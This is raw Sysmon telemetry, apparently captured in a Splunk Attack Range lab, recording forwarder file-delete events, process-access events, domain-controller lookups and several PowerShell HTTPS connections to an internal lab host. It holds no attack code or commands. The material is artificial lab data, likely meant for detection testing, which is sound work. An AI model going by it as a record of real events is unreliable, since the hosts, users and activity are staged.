18:18:30.999{00000000-0000-0000-0000-000000000000}6916<unknown process>-tcptruefalse10.0.1.15win-host-987.attackrange.local56796-false10.0.1.14WIN-DC-128389ldap 23542300x800000000000000035086100Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:07.173{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=890690DD1B66D86EF858F8A8E0F19A49,SHA256=8E96A98D8E5C3D20D937274B469FEC4FF6765BA0FE3205C3581760F6F7280798,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086099Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:07.169{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=85B0F2C4CD2BAEEA71CE6ADBFDBCB71E,SHA256=A33473AC7B577DA230E7394FD4DD65B7871EA37A13B445015C9C92D644823D0D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 22542200x800000000000000035086098Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:30.998{00000000-0000-0000-0000-000000000000}6916WIN-DC-128.ATTACKRANGE.LOCAL0::ffff:10.0.1.14;<unknown process> 22542200x800000000000000035086097Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:30.997{00000000-0000-0000-0000-000000000000}6916_ldap._tcp.WIN-DC-128.ATTACKRANGE.LOCAL.9003-<unknown process> 22542200x800000000000000035086096Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:30.997{00000000-0000-0000-0000-000000000000}6916_ldap._tcp.Default-First-Site-Name._sites.WIN-DC-128.ATTACKRANGE.LOCAL.9003-<unknown process> 
23542300x800000000000000035086105Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:08.870{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C42C953711B37F9145FE56EAAFD8638,SHA256=94CBCDA1EE74C2403F39326CF061B0091A9C2EF59C42F10633066AC14EEA105D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086104Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:32.486{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56798-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086106Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:09.873{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CB7109BD23668548FD3D396779D800D,SHA256=3CB4D1394F566101971E7EFFAAF175FB124B83BD3E2A87E90CF2B2C0E53D3B7C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086107Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:10.903{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=381410984BAFDEE7CF45CB4CF3B89039,SHA256=E17C4F2198A37B71F10F5C0EA46C02C3F0CAA1E69BFED24A2E7A96267E726228,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 23542300x800000000000000035086108Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:11.918{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E94374285A3B3F99F108DD33C542015,SHA256=A47E14A95ABFE68A9D24BF2DFCA6CF461E6E55E682F2E448585A6738404844CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086109Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:12.932{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=921BC3D3C36D345BA912E8CE6DA925AA,SHA256=1FA97D44ECC5E8ADCB03B8D68B603414D03C5E79492D86C2CFD2F564016DB428,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086129Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.947{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=747DC3F2DF119F41F9D193AD1EBB1169,SHA256=6E44A59BF917117D4D61A5954CAE78635CAB7A96F284215DCB00457C5A26A72D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035086128Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.766{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4FE5-613A-7F90-03000000C801}5924C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086127Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.764{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086126Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:18:13.764{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086125Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.764{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086124Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:18:13.764{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086123Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.764{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4FE5-613A-7F90-03000000C801}5924C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086122Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.763{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4FE5-613A-7F90-03000000C801}5924C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035086121Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.748{B81B27B7-4FE5-613A-7F90-03000000C801}5924C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035086120Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.747{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2FADA16297837A858DC27D7A7C96E2E3,SHA256=5D47A099CB9DE73D0B3900B2D6C4C0829477FE0B211C09000135DF8DFB2C37EA,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 354300x800000000000000035086119Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:37.275{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56799-false10.0.1.12-8000- 10341000x800000000000000035086118Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.247{B81B27B7-4FE5-613A-7E90-03000000C801}66923692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086117Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.069{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4FE5-613A-7E90-03000000C801}6692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086116Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:18:13.069{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086115Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.069{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086114Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:18:13.069{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086113Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.069{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035086112Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:18:13.069{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4FE5-613A-7E90-03000000C801}6692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035086111Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.069{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4FE5-613A-7E90-03000000C801}6692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035086110Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:13.064{B81B27B7-4FE5-613A-7E90-03000000C801}6692C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035086133Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:14.965{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F699A5DB446FCED650AB1C350B3D041C,SHA256=92C8C9D1322A4D2915B7FCAFAB731F93FAE9AF6C5C064A9D92C758466A41E270,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035086132Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:38.527{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56800-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035086131Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:14.085{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=522D450339F7AE8BE981B840A1B395F5,SHA256=F5E9626663EFA8B1DD8C1CDAF6C86128E8F7101A41D04DF937740FCF9D5BB53A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035086130Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:14.085{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=18E9EDA02EC4E09427DEA5D102C75026,SHA256=B839DED061C18388BB16210C4C186364110424F77A9C20264CBD7CD97E149C72,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086140Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:15.986{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FFDAADB12FF3C8FD652396C96928D55,SHA256=28224754CACCF9F46B308A21C127894D65A79CBBDF4C473705CE107025AAF7BC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086139Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:15.084{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=33EAF2DFEC1E9B3BDD9187B0C9799C62,SHA256=FF94C1C37B788A1B04F94992124D47F0C79ED148B689FB1A39273FDDA2840632,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086138Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:15.084{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=78BFD1A943F10BDF3537606393E03F8D,SHA256=F8B0D1528D65C903E020F9BAE7A0813F683A9D84224CFCE520F5835D5D36ABC0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086137Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:18:15.084{B81B27B7-5BF5-611D-6D04-00000000C801}5004ATTACKRANGE\REED_SCHMIDTC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\reed_schmidt\AppData\Roaming\Mozilla\Firefox\Profiles\ascrdua7.default-release\datareporting\glean\db\data.safe.binMD5=D031AE979C5113E0FD63E8AE49C898F2,SHA256=2A1D60F4B7D7A4C67CA0530EFEA3106390D01956E91CE4FC4A276FE10C4C3EEF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035086136Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 